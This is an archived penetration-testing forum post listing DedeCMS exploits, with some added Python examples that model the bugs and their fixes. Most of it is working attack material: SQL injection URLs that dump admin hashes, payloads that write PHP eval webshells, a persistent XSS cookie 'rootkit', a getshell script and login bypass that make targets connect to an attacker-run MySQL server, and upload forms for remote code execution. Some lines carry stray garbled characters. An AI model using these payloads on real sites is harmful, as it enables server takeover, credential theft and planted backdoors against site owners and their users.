China Network Penetration Testing Alliance

Title: DedeCMS vulnerability summary [Print this page]

Author: admin    Time: 2012-10-18 10:42
Title: DedeCMS vulnerability summary

Dedecms 5.6 RSS injection vulnerability

http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1

DedeCms v5.6 embedded malicious code execution vulnerability
Register as a member and upload a piece of software; in the "local address" field enter: a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the entry executes the code.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This writes x.php, a one-line shell with password xiao.

Dede 5.6 GBK SQL injection vulnerability

http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

  _' X$ R; M, T/ G/ I) xDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
" l' e3 W% R0 Z( ~9 r
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
6 k; Y7 c+ H, B- ^
  k0 L% {# p/ z8 Z# n
' c8 d2 y! G1 \5 Z7 z) Q3 |) X8 u' ?3 k% l8 \$ M# E- ^

3 Z1 ?7 B, @' c- E, B) |# O, K4 Z
5 C/ n& H8 ?- Y; G0 y2 }2 B* q' P2 |
DEDECMS all versions: gotopage variable XSS vulnerability
1. Copy and paste the URL below into the browser to trigger the XSS and install the XSS rootkit. Note that IE8/9 block URL-based XSS; the XSS filter has to be switched off.

http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="

2. Close the browser. Whichever of the URLs below you visit afterwards, our XSS fires.

http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda

http://v57.demo.dedecms.com/dede/login.php

DeDeCMS (织梦) variable overwrite getshell
#!/usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.com www.webvul.com
');
echo "\r\n";
// Arguments: target host, aid (selects where the shell lands) and the install subdirectory.
if(!isset($argv[2])){
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
    exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=isset($argv[3]) ? $argv[3] : '';
$exp=Getshell($url,$aid,$path);
// Getshell() returns only the first response line ("HTTP/1.1 200 OK"),
// so "OK" past offset 12 just means the request came back with a 200.
if (strpos($exp,"OK")>12){
    echo "Exploit Success \n";
    if($aid==1) echo "Shell:".$url."/$path/data/cache/fuck.php\n";
    if($aid==2) echo "Shell:".$url."/$path/fuck.php\n";
    if($aid==3) echo "Shell:".$url."/$path/plus/fuck.php\n";
}else{
    echo "Exploit Failed \n";
}

function Getshell($url,$aid,$path){
    $id=$aid;
    $host=$url;
    $port="80";
    // Body of the mytag_js.php form from the "tag remote file write" section below.
    // The _COOKIE[GLOBALS][cfg_db*] fields point the target at a MySQL server the
    // attacker controls (hard-coded here as 184.105.174.114 / exploit / 90sec);
    // that server must hold the dede_mytag row carrying the {dede:php} payload.
    $content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
    $data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
    $data .= "Host: ".$host."\r\n";
    $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
    //$data .= "Accept-Encoding: gzip,deflate\r\n";
    $data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
    $data .= "Connection: keep-alive\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "Content-Length: ".strlen($content)."\r\n\r\n";
    $data .= $content."\r\n";
    $ock=fsockopen($host,$port);
    if (!$ock) {
        echo "No response from ".$host."\n";
        return '';
    }
    fwrite($ock,$data);
    // Read the status line only; the caller checks it for "OK".
    while (!feof($ock)) {
        $exp=fgets($ock, 1024);
        return $exp;
    }
    return '';
}
?>

DedeCms v5.6-5.7 unauthorized access vulnerability (straight into the admin backend)

http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

(织梦网站后台 in the URL stands for the site's backend directory.)

Change validate=dcug above to the current captcha value and you go straight into the site's backend.

Prerequisite for this vulnerability: the backend path must already be known.

Dedecms (织梦) tag remote file write vulnerability
Prerequisite: prepare your own dede database first, then insert this row: insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');

Then submit with the form below and the shell is 1.php in the same directory. Work out the mechanics yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction()">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="Submit" name="QuickSearchBtn"><br />
</form>
<script>
// Point the form at whatever target URL was typed into the doaction field.
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>

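The mytag_js.php form above, the PHP script before it and the login.php bypass all send the database settings as nested request keys: _COOKIE[GLOBALS][cfg_dbhost] in a POST body, _POST[GLOBALS][cfg_dbhost] in a query string. The Python below is an added example, not DedeCMS's code and not from the post: it models the shape of the variable-registration bug those payloads rely on (a denylist that only inspects top-level request keys, followed by a loop that turns every key of _GET, _POST and _COOKIE into a variable, re-reading each source by name) next to a recursive check that closes it. How the overwritten cfg_db* values reach the database connection inside DedeCMS is not shown on this page; the model simply has the connector read them out of the GLOBALS array. The select_soft_post.php exploit further down is the same bug class with PHP's own register_globals doing the registering, which is why it can set cfg_imgtype and friends directly.

```python
"""Added example (not from the original post): a model of request-variable
registration as targeted by the _COOKIE[GLOBALS][cfg_dbhost] (mytag_js.php)
and _POST[GLOBALS][cfg_dbhost] (login.php) payloads on this page. Our
reconstruction of the bug's shape, not DedeCMS's code. The site config, the
denylists and the sample requests are constructed."""
import re

SITE_CONFIG = {"cfg_dbhost": "localhost", "cfg_dbuser": "dede"}  # constructed
DENY_TOP = re.compile(r"^(cfg_|GLOBALS)")
DENY_ANY = re.compile(r"^(cfg_|GLOBALS|_GET|_POST|_COOKIE|_REQUEST|_SERVER|_SESSION)")


def _register(scope):
    """Copy every key of _GET, _POST, _COOKIE into scope, in that order. Each
    source is looked up by name on each pass, so a request key that names a
    later source replaces that source before it is walked."""
    for source in ("_GET", "_POST", "_COOKIE"):
        for key, value in list(scope[source].items()):
            scope[key] = value
    return scope


def register_vulnerable(get, post, cookie):
    """Denylist applied to top-level request keys only, then register."""
    for key in {**cookie, **get, **post}:
        if DENY_TOP.match(key):
            raise PermissionError("Request var not allow!")
    scope = {"_GET": dict(get), "_POST": dict(post), "_COOKIE": dict(cookie),
             "GLOBALS": dict(SITE_CONFIG)}
    return _register(scope)


def check_recursive(value):
    """Hardened check: reject a denied name at any nesting depth."""
    if isinstance(value, dict):
        for k, v in value.items():
            if DENY_ANY.match(str(k)):
                raise PermissionError("Request var not allow: " + str(k))
            check_recursive(v)


def register_hardened(get, post, cookie):
    for source in (get, post, cookie):
        check_recursive(source)
    scope = {"_GET": dict(get), "_POST": dict(post), "_COOKIE": dict(cookie),
             "GLOBALS": dict(SITE_CONFIG)}
    return _register(scope)


def db_host(scope):
    """What a connector that reads its settings from GLOBALS would dial."""
    return scope["GLOBALS"]["cfg_dbhost"]


# Constructed requests. PHP parses a field named _COOKIE[GLOBALS][cfg_dbhost]
# into exactly this nested array shape.
EVIL_DB = {"cfg_dbhost": "attacker-db.example", "cfg_dbuser": "exploit"}
MYTAG_POST = {"doaction": "/plus/mytag_js.php?aid=1", "_COOKIE": {"GLOBALS": EVIL_DB}}
LOGIN_GET = {"dopost": "login", "userid": "admin", "_POST": {"GLOBALS": EVIL_DB}}

if __name__ == "__main__":
    print("mytag_js.php POST ->", db_host(register_vulnerable({}, MYTAG_POST, {})))
    print("login.php GET    ->", db_host(register_vulnerable(LOGIN_GET, {}, {})))
    try:
        register_hardened({}, MYTAG_POST, {})
    except PermissionError as err:
        print("hardened:", err)
```

Run it and both attacker requests come back with the connector pointed at attacker-db.example under the vulnerable registration, while a bare GLOBALS or cfg_ key at the top level is still refused; that difference is exactly why the payloads nest the keys one level down. The hardened version rejects both nested requests before anything is registered.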
Dedecms <= V5.6 Final template execution vulnerability
1. Register a user, enter the member backend, publish an article and upload an image. Then, in attachment management, replace the image with our crafted template. Say the image name is:
uploads/userup/2/12OMX04-15A.jpg

The template content is (if the image format is checked, prepend gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just published, view the page source, and build a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />

<div id="mainCp">
<h3 class="meTitle"><strong>Edit article</strong></h3>

<div class="postForm">
<label>Title:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>

<label>Tags:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(comma separated)

<label>Author:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>

<label>Category:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test category</option>
</select> <span style="color:#F00">*</span>(coloured categories cannot be selected)

<label>My category:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>Select a category...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>

<label>Summary:</label>
<textarea name="description" id="description">1111111</textarea>
(brief description of the content)

<label>Thumbnail:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>

<input type='text' name='templet' value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields' value="templet,htmltext;">(the crafted part)
</div>

<!-- form action area -->
<h3 class="meTitle">Content</h3>

<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="&lt;div&gt;&lt;a href=&quot;http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg&quot; target=&quot;_blank&quot;&gt;&lt;img border=&quot;0&quot; alt=&quot;&quot; src=&quot;http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg&quot; width=&quot;1010&quot; height=&quot;456&quot; /&gt;&lt;/a&gt;&lt;/div&gt; &lt;p&gt;&lt;?phpinfo()?&gt;1111111&lt;/p&gt;" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>

<label>Captcha:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="Can't read it? Click to refresh" align="absmiddle" style="cursor:pointer" />

<button class="button2" type="submit">Submit</button>
<button class="button2 ml10" type="reset">Reset</button>
</div>

</div>

</form>

Submit; if it reports success, we have changed the template path. 3. Visit the modified article:
Assuming the article just edited has aid 2, just visit:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is created in the plus directory.

DEDECMS site management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save as 1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit">Change</button>
</form>

Build the form above; after upload the image is saved as /uploads/userup/3/1.gif
Publish an article, then build the edit form as follows:

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>Select a category...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">Submit</button>
</form>

Dedecms (织梦) V5.6 remote file deletion vulnerability

http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

Dedecms (织梦) V5.6 plus/carbuyaction.php local file inclusion vulnerability
http://www.test.com/plus/carbuya ... urn&code=../../

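The oldface value in the file-deletion URL, the code=../../ in the inclusion URL above, and the templet=../uploads/userup/... values in the two article-edit forms all depend on the same thing: a user-supplied path is checked as a string, or not at all, and then handed to the filesystem, which resolves the `..` segments. The Python below is an added example, not DedeCMS's code and not from the post: it puts a prefix check of the kind such values slip past next to a check that normalises first and confines the result, plus the bare-filename rule appropriate for values that select a file by name. The web root, upload directory and sample paths are constructed.

```python
"""Added example (not from the original post): path checks that the oldface
(edit_face.php), code (carbuyaction.php) and templet (article edit) values
on this page get past, next to checks that hold. Web root, upload directory
and sample paths are constructed; the logic is ours, not DedeCMS's."""
from posixpath import join, normpath

WEBROOT = "/var/www/html"           # constructed
UPLOAD_PREFIX = "/uploads/userup/"  # where member uploads are expected to live


def delete_target_prefix_check(oldface):
    """Vulnerable: trusts a string prefix. The traversal in
    /uploads/userup/8/../../../member/... starts with the prefix, so it passes,
    and the filesystem then resolves the '..' segments."""
    if not oldface.startswith(UPLOAD_PREFIX):
        return None
    return WEBROOT + oldface


def delete_target_confined(oldface):
    """Hardened: normalise first, then require the result to stay inside the
    upload directory (the directory itself is not a deletable target either)."""
    full = normpath(join(WEBROOT, oldface.lstrip("/")))
    base = normpath(WEBROOT + UPLOAD_PREFIX)
    if full == base or not full.startswith(base + "/"):
        return None
    return full


def is_plain_name(value):
    """For values that select a file by name (a template, a payment module):
    accept a bare file name only, never a path or a traversal."""
    return bool(value) and "/" not in value and "\\" not in value \
        and ".." not in value and "\x00" not in value


def filesystem_view(path):
    """What the OS actually opens once '..' segments are resolved."""
    return normpath(path)


if __name__ == "__main__":
    traversal = "/uploads/userup/8/../../../member/templets/images/m_logo.gif"
    weak = delete_target_prefix_check(traversal)
    print("prefix check accepted:", weak)
    print("which the OS resolves to:", filesystem_view(weak))
    print("confined check:", delete_target_confined(traversal))
    print("templet value is a plain name:", is_plain_name("../uploads/userup/3/1.gif"))
```

On a real server the confined check should be done on the canonical path (realpath, after symlinks) and the deletion restricted to the requesting member's own subdirectory; the normalisation shown here is the minimum that stops the `..` escape.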
DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The stored password is the 32-character MD5 with the first 5 and last 7 characters removed, which leaves 20 characters; to get the 16-character MD5 from that, drop a further 3 from the front and 1 from the back.

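The hash arithmetic above, together with the MID(pwd,4,16) slice and the updatexml() error that the rss.php payload at the top of the post uses to leak it, as a worked example in Python. This is added here and is not from the post: the slicing follows the description (drop 5 and 7, then 3 and 1), the parameter names reproduce the structure of the rss.php URL, and the sample response text is constructed, not captured from a target.

```python
"""Added example (not from the original post): the DedeCMS password-hash
arithmetic described above, and the MID(pwd,4,16) + updatexml() trick the
rss.php payload at the top of the post uses to leak it. Slicing offsets follow
the post; the parameter names mirror the rss.php URL; SAMPLE_RESPONSE is
constructed."""
import hashlib
import re


def dede_stored_pwd(md5_hex):
    """The 20-character form kept in dede_admin.pwd: the 32-char MD5 with
    5 characters dropped from the front and 7 from the back."""
    if len(md5_hex) != 32:
        raise ValueError("expected a 32-char hex MD5")
    return md5_hex[5:-7]


def dede_md5_16(stored):
    """16-char MD5 out of the 20-char stored form: drop 3 more from the front
    and 1 from the back. Same slice as MySQL's MID(pwd,4,16) in the payload."""
    if len(stored) != 20:
        raise ValueError("expected the 20-char stored form")
    return stored[3:-1]


def md5_16_of(password):
    """Conventional 16-char MD5 (hex digits 8..23), for cross-checking."""
    return hashlib.md5(password.encode()).hexdigest()[8:24]


def rss_leak_params(prefix="dede_"):
    """Query parameters of the rss.php payload. updatexml() rejects an XPath
    that starts with '[' and quotes it back in the error message, so the
    CONCAT() of uname and the hash slice lands in the MySQL error text."""
    subq = ("SELECT CONCAT(0x5b,uname,0x3a,MID(pwd,4,16),0x5d) FROM "
            + prefix + "admin")
    return {
        "tid": "1",
        "_Cs[][1]": "1",
        "_Cs[2)) AND \"'\" AND updatexml(1,(" + subq + "),1)#'][0]": "1",
    }


LEAK_RE = re.compile(r"XPATH syntax error: '\[([^:\]]+):([0-9a-f]{16})\]'")


def parse_updatexml_leak(body):
    """(uname, md5_16) recovered from a response that echoed the MySQL error,
    or None when the error text is absent."""
    m = LEAK_RE.search(body)
    return (m.group(1), m.group(2)) if m else None


# Constructed response: the error an 'admin' / 'admin' account would produce.
SAMPLE_RESPONSE = ("<b>MySQL error</b>: XPATH syntax error: "
                   "'[admin:7a57a5a743894a0e]' in /plus/rss.php")

if __name__ == "__main__":
    stored = dede_stored_pwd(hashlib.md5(b"admin").hexdigest())
    print("stored:", stored, "md5_16:", dede_md5_16(stored), md5_16_of("admin"))
    print("leak:", parse_updatexml_leak(SAMPLE_RESPONSE))
    print(rss_leak_params())
```

The 16-character value recovered this way is the standard short MD5 of the password, so it can be looked up directly. Error text returned through updatexml() is limited to 32 characters, which is why the payload slices the hash to 16 rather than pulling all 20 stored characters plus the user name.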
Dedecms (织梦) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

Dedecms (织梦) select_soft_post.php uninitialized variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action="http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php" method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='OK' />
</form>
<br />It's just an exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game, get a webshell at /data/cache/fly.php...<br />
</body>
</html>

Dedecms (织梦) 5.3 – 5.5 plus/digg_frame.php injection vulnerability
Relies on a MySQL numeric field overflow raising an error, combined with DEDECMS recording database error messages in a PHP file whose header is not validated.
1. Visit:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
The error message is visible.

2. Visit
http://www.abc.com/data/mysql_error_trace.php; seeing the following proves the injection worked:
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>

3. Run test.html from dede.rar; note that the form action address is

<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">

After clicking OK, seeing the same output as in step 2 means the trojan file was uploaded successfully.

* l' u* F% `8 N. v% W- l3 y织梦(DedeCms)plus/infosearch.php 文件注入漏洞
# ]1 V, C) I. r2 K8 Shttp://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
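The %cf in front of the quote is the wide-byte trick, and the Dede 5.6 GBK section earlier in the post probes for the same charset-handling weakness. addslashes() works on bytes and puts a backslash (0x5C) before the quote; a connection running in GBK then reads the 0xCF lead byte and that 0x5C as one two-byte character, and the quote after it is live again. The Python below is an added example, not from the post: the addslashes() model, the query template, the hardened variant and the inputs are ours; only the payload text comes from the URL above.

```python
"""Added example (not from the original post): the wide-byte trick behind the
%cf' in the infosearch.php payload. addslashes() is byte-level; a GBK
connection pairs the 0xCF lead byte with the inserted 0x5C backslash, and the
quote survives unescaped. The addslashes() model, the template and the inputs
are ours."""


def addslashes(data):
    """Byte-wise model of PHP's addslashes(): backslash before ' " \\ and NUL.
    It knows nothing about multibyte encodings, which is the whole problem."""
    out = bytearray()
    for b in data:
        if b in (0x27, 0x22, 0x5C, 0x00):
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def has_unescaped_quote(text):
    """True when the decoded text holds a single quote not preceded by a backslash."""
    return any(ch == "'" and (i == 0 or text[i - 1] != "\\")
               for i, ch in enumerate(text))


def escaped_as_mysql_sees_it(user_input, charset="gbk"):
    """Vulnerable order: addslashes() the raw bytes, then let the connection
    decode the result in its own charset."""
    return addslashes(user_input).decode(charset, errors="replace")


def vulnerable_query(user_input, charset="gbk"):
    """The concatenation pattern behind the injection, decoded as MySQL would."""
    sql = b"SELECT * FROM dede_archives WHERE title='" + addslashes(user_input) + b"'"
    return sql.decode(charset, errors="replace")


def escape_after_decoding(user_input, charset="gbk"):
    """Hardened order: decode with the connection charset first, then escape
    characters. Prepared statements, or mysqli_real_escape_string() on a
    connection whose charset was set with set_charset(), are the real fix;
    this only shows why the order matters."""
    text = user_input.decode(charset, errors="replace")
    return text.replace("\\", "\\\\").replace("'", "\\'")


# Constructed inputs: the post's infosearch payload, with and without the wide byte.
PLAIN = b"' union select 1,2,userid,4,pwd,6 from dede_admin/*"
WIDE = b"\xcf" + PLAIN

if __name__ == "__main__":
    for label, data in (("plain", PLAIN), ("wide ", WIDE)):
        seen = escaped_as_mysql_sees_it(data)
        print(label, "->", repr(seen), "| quote live:", has_unescaped_quote(seen))
    print("hardened ->", repr(escape_after_decoding(WIDE)))
```

The same check, decoding the escaped bytes with the connection's charset and looking for a live quote, is a cheap test to run against any legacy PHP code path that still escapes by bytes on a GBK, Big5 or Shift_JIS connection.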





Welcome to China Network Penetration Testing Alliance (https://cobjon.com/) Powered by Discuz! X3.2